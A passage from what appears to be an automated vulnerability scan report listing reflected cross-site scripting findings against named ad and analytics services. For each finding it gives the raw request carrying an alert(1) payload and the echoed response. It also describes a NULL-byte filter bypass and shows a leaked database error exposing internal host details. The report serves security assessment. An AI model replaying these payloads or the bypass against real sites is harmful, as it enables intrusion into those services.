Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 07 May 2011 20:41:14 GMT
Content-Length: 919

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b00/c/1ba/%2a/k;237330678;0-0;0;59094481;3454-728/90;41170091/41187878/1;;~sscs=%3fhttp://adclick.g.doubleclick.net/aclk?sa=Le5ce2'-alert(1)-'27755194820&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJs
...[SNIP]...

5.21. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f984d"-alert(1)-"cae446732d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1738535&f984d"-alert(1)-"cae446732d4=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://adopt.imiclk.com/emb/q?size=728x90&m=3&l=2792891&c=200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; 
bh="b!!!$s!!!?H!!!!%<wR0_!!*oY!!!!#<xqZB!!-?2!!!!*<xqZB!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!$<xqZB!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<xqZB!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#<y]81!!tjQ!!!!$<xqZB!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!$<xqZB!!wQ3!!!!$<xqZB!!wQ5!!!!$<xqZB!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!(<xt]U!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3_i!!!!#<yMiw!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`S2!!!!$<xqZB!#`U0!!!!#
<xqZB!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!#<xqZB!#a=7!!!!#<xqZB!#a=9!!!!#<xqZB!#a=P!!!!#<xqZB!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG+!!!!#<xqZB!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!$<xqZB!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!$<xqZB!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 22:39:20 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 07 May 2011 22:39:20 GMT
Pragma: no-cache
Content-Length: 4324
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=728x90&f984d"-alert(1)-"cae446732d4=1&s=1738535&_salt=1043515613";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

5.22. http://adsfac.us/ag.asp [cc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 40985<script>alert(1)</script>52a30286c50 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=40985<script>alert(1)</script>52a30286c50&source=js&ord=5429500 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSDLK001=pctl=311878&fpt=0%2C311878%2C&pct%5Fdate=4131&FL311878=1&pctm=1&FM34631=1&pctc=34631&FQ=1; FSESE002=pctl=311033&fpt=0%2C311033%2C&pct%5Fdate=4133&FL311033=1&pctm=1&FM34983=1&pctc=34983&FQ=1; FSQTS032=pctl=304931&fpt=0%2C304931%2C&pct%5Fdate=4139&pctm=1&FL304931=1&FM36289=1&pctc=36289&FQ=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Sat, 07 May 2011 01:49:21 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FS40985%3Cscript%3Ealert%281%29%3C%2Fscript%3E52a30286c500=uid=101126131; expires=Sun, 08-May-2011 01:50:20 GMT; path=/
Set-Cookie: FS40985%3Cscript%3Ealert%281%29%3C%2Fscript%3E52a30286c50=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4143&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Tue, 07-Jun-2011 01:50:20 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sat, 07 May 2011 01:50:20 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://ADSFAC.US/link.asp?cc=40985<script>alert(1)</script>52a30286c50.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

5.23. http://apps.sapha.com/appshandler.php [ac parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload %0096ee3<script>alert(1)</script>d1ed8df0664 was submitted in the ac parameter. This input was echoed as 96ee3<script>alert(1)</script>d1ed8df0664 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /appshandler.php?ac=1%0096ee3<script>alert(1)</script>d1ed8df0664&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Host: apps.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 600

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT SQL_CACHE t1.site_application_id FROM site_application t1, application t3 WHERE t1.application_id = t3.application_id AND t1.site_ID = 1.96ee3<script>alert(1)</script>d1ed8df0664 AND t1.site_application_isactive = 1 ORDER BY t3.application_order, t1.site_application_id<br>
...[SNIP]...

5.24. http://apps.sapha.com/appshandler.php [ac parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload f84ef<script>alert(1)</script>6416a2fdb7e was submitted in the ac parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appshandler.php?ac=2546f84ef<script>alert(1)</script>6416a2fdb7e&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: apps.sapha.com
Cookie: sapha_tst_2546=TRUE

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:54:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 682

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT SQL_CACHE t1.site_application_id FROM site_application t1, application t3 WHERE t1.application_id = t3.application_id AND t1.site_ID = 2546f84ef<script>alert(1)</script>6416a2fdb7e AND t1.site_application_isactive = 1 ORDER BY t3.application_order, t1.site_application_id<br>
...[SNIP]...

5.25. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload e1fc4<script>alert(1)</script>5e2e2ed7ccb was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8e1fc4<script>alert(1)</script>5e2e2ed7ccb&c2=2113&c3=16&c4=12317&c5=32856&c6=&c10=197334&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:14 GMT
Date: Sat, 07 May 2011 22:38:14 GMT
Connection: close
Content-Length: 1249

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8e1fc4<script>alert(1)</script>5e2e2ed7ccb", c2:"2113", c3:"16", c4:"12317", c5:"32856", c6:"", c10:"197334", c15:"", c16:"", r:""});
5.26. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload f7157<script>alert(1)</script>8ca44a1cf27 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=16&c4=12317&c5=32856&c6=&c10=197334f7157<script>alert(1)</script>8ca44a1cf27&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:28 GMT
Date: Sat, 07 May 2011 22:38:28 GMT
Connection: close
Content-Length: 1249

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"16", c4:"12317", c5:"32856", c6:"", c10:"197334f7157<script>alert(1)</script>8ca44a1cf27", c15:"", c16:"", r:""});
5.27. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 88164<script>alert(1)</script>91bf12a9f59 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=16&c4=12317&c5=32856&c6=&c10=197334&c15=88164<script>alert(1)</script>91bf12a9f59 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:31 GMT
Date: Sat, 07 May 2011 22:38:31 GMT
Connection: close
Content-Length: 1249

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"16", c4:"12317", c5:"32856", c6:"", c10:"197334", c15:"88164<script>alert(1)</script>91bf12a9f59", c16:"", r:""});
5.28. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload e1990<script>alert(1)</script>34c577c3e19 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113e1990<script>alert(1)</script>34c577c3e19&c3=16&c4=12317&c5=32856&c6=&c10=197334&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:16 GMT
Date: Sat, 07 May 2011 22:38:16 GMT
Connection: close
Content-Length: 1249

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113e1990<script>alert(1)</script>34c577c3e19", c3:"16", c4:"12317", c5:"32856", c6:"", c10:"197334", c15:"", c16:"", r:""});
5.29. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload edfaf<script>alert(1)</script>b066ab31bd7 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=16edfaf<script>alert(1)</script>b066ab31bd7&c4=12317&c5=32856&c6=&c10=197334&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/politics/Malloys-Plan-B-Cuts-4700-State-Jobs---121401459.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 14 May 2011 22:38:19 GMT
Date: Sat, 07 May 2011 22:38:19 GMT
Connection: close
Content-Length: 1249

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
